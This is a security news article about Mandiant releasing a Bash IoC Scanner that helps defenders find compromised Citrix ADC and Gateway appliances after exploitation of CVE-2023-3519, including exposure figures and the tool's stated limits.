With thousands of Citrix networking products vulnerable to a critical vulnerability still unpatched and exposed on the Internet, Mandiant has released a tool to help enterprise defenders identify those that have been compromised.
The IoC Scanner is designed to be used with Citrix ADC and Citrix Gateway version 13.1, Citrix ADC and Citrix Gateway version 13.0, Citrix ADC and Citrix Gateway version 12.1, Citrix ADC, and Citrix Gateway version 12.0.
Citrix issued a patch for the zero-day critical vulnerability (CVE-2023-3519) in its NetScaler application delivery controller and gateway products on July 18, along with a recommendation for organizations using the affected products to apply it immediately. The vuln could be exploited to allow unauthenticated remote code execution. Several threat groups are already actively exploiting the flaw by installing web shells inside of corporate networks and carrying out dozens of exploits.
Researchers say that nearly 7,000 instances remain exposed on the Web. Of those, around 460 have Web shells installed, likely due to compromise.
Mandiant’s tool, available on GitHub, can identify the file system paths of known malware, post-exploitation activity in shell history, unexpected crontab entries and processes, and known malicious terms and unexpected modification of NetScaler directories. The standalone Bash script can be run directly on a Citrix ADC appliance to scan files, processes, and ports for known indicators. (The tool must be run as root in live mode on the appliance.) It can also inspect a mounted forensic image to use in an investigation, Mandiant said.
The IoC Scanner will do a “best-effort job“ at identifying compromised products, but it may not be able to find all compromised devices or be able to whether the device is vulnerable to exploitation, Mandiant said. “This tool is not guaranteed to find all evidence of compromise, or all evidence of compromise related to CVE 2023-3519,” according to the company.